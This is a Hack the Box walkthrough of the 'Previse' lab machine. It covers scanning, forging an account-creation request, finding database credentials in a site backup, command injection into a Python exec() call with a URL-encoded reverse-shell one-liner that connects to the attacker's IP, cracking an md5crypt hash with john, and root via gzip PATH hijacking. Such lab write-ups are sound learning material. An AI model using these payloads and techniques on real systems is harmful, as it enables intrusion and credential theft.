Hack the Box - Previse

hack the box Jan 8, 2022

Welcome back! Today's Hack the Box write-up is for the machine Previse. This machine is listed as an easy Linux machine. Let's get to it!

As usual, we start with a full nmap scan. Here are our results.

Nmap scan report for 10.10.11.104
Host is up (0.048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports available, so it looks like our path with be via web exploit of some type. So we'll load up Burpsuite and see what's being hosted on port 80.

We see that a basic username / password landing page. Before we start digging into the web requests, we'll try to enumerate any additional files or directories with gobuster.

Command:
gobuster dir -u http://10.10.11.104 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .php,.old,.bak -t 60 -b 403,404

We see a bunch of files. We check them all and find the nav.php has some interesting links.

When trying to access all of these resources, we need an account. Luckily for us, we have a create account page! However, the page isn't accessable via the browser. When we view the HTTP request, we see that is actually something we can access.

Given that we can see the source for this request, we know the parameters we need to POST in order to create an account.

So we will craft the request we need to supply a username, password and confirmation password. We also need to be sure to add our Content-Type of application/x-www-form-urlencoded. All together, we have the following request.

We send the request and we get back a success message!

We can now log into the site. When we start looking around we find the file SITEBACKUP.ZIP in the files section. We download the file and unzip it to find exactly what we think, a backup of the site. We see in config.php a username and password.

We still need a username to go with the password. Now, if we look around the site a bit more we have a Request Log Data section. If we download the file, we can see the users associated to logging in, this could give us a user to SSH with.

Unable to login with those credentials. Now as we continue to sift through the files, we find a gem. A Python exec() call in the logs.php file.

This is not a properly sanatized output, meaning we can leverage it to break things. More on Command Injection here.

The key thing to remember here is that Python is calling the exec() function. So any injection we want to do, has to be in 'code'. More on that here.

We will use a python 'one-liner' to gain a remote shell. Take your pick from here. Just be to use URL encode the request!

Here's our request data being sent.

delim=comma;python3+-c+'a%3d__import__%3bs%3da("socket")%3bo%3da("os").dup2%3bp%3da("pty").spawn%3bc%3ds.socket(s.AF_INET,s.SOCK_STREAM)%3bc.connect(("10.10.14.99",4242))%3bf%3dc.fileno%3bo(f(),0)%3bo(f(),1)%3bo(f(),2)%3bp("/bin/bash")'

We sping up a netcat listener on port 4242.

Command:
nc -lvnp 4242

Now ww send our request (a few times), and eventually get a response back on our netcat listener

Before we start enumerating any further, we should check to see if we have mysql access. We have credentials from before that we should try to leverage and see what we have access to.

Command:
mysql -u root -p'mySQL_p@ssw0rd!:)'

Sure enough, we have access! Now we can start sifting through the database.

Commands:

use previse;
show tables;
select * from accounts;

Now we see our username and hashes. We'll copy them out to crack, we really just want m4lwhere in particular.

Command:
echo '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' > m4lwhere.hash

Now we can run it against rockyou.txt to see what we might be able to find. In this case I'll use john.

Command:
john -w=/usr/share/wordlists/rockyou.txt m4lwhere.hash --format=md5crypt-long

A few minutes later we get a match ilovecody1122235!. Now let's see if we can SSH with this password.

Sure enough, we are in! Let's snag our user.txt flag and find a way to root! The next thing we check is sudo -l.

It looks like we have the ability to run a backup script.

The problem with this script is that its just saying gzip. It's not giving a specific path to gzip. This is Path Hijacking and it's the reason why you should ensure your paths are explicit and narrow as can be. What we'll do is create our own gzip file. This will just be a simple file to cat our the root.txt flag.

Step one - create a file in a temporary directory in tmp. We do it this way so that we don't ruin the box for others.

Command:
mkdir /tmp/rf
cd /tmp/rf

Step two - create our 'malicous' gzip file.

Command:
echo 'cat /root/root.txt > /tmp/rf/flag.txt' > gzip
chmod +x gzip

Step three - we will add our temporary path to the enviornmental variables.

Command:
export PATH=/tmp/rf:$PATH

You can see that our temporary path has been pre-pended to our PATH. This means that the Linux Operating System will check this path before all others for any executable we are running. In this case, the evil gzip file.

Now we simply run our privledged script.

Command:
sudo /opt/scripts/access_backup.sh

We get a text file with the root.txt flag inside! Feel free to send respect my way if you found this write-up helpful.

HTB Profile - https://app.hackthebox.eu/profile/95635

Tags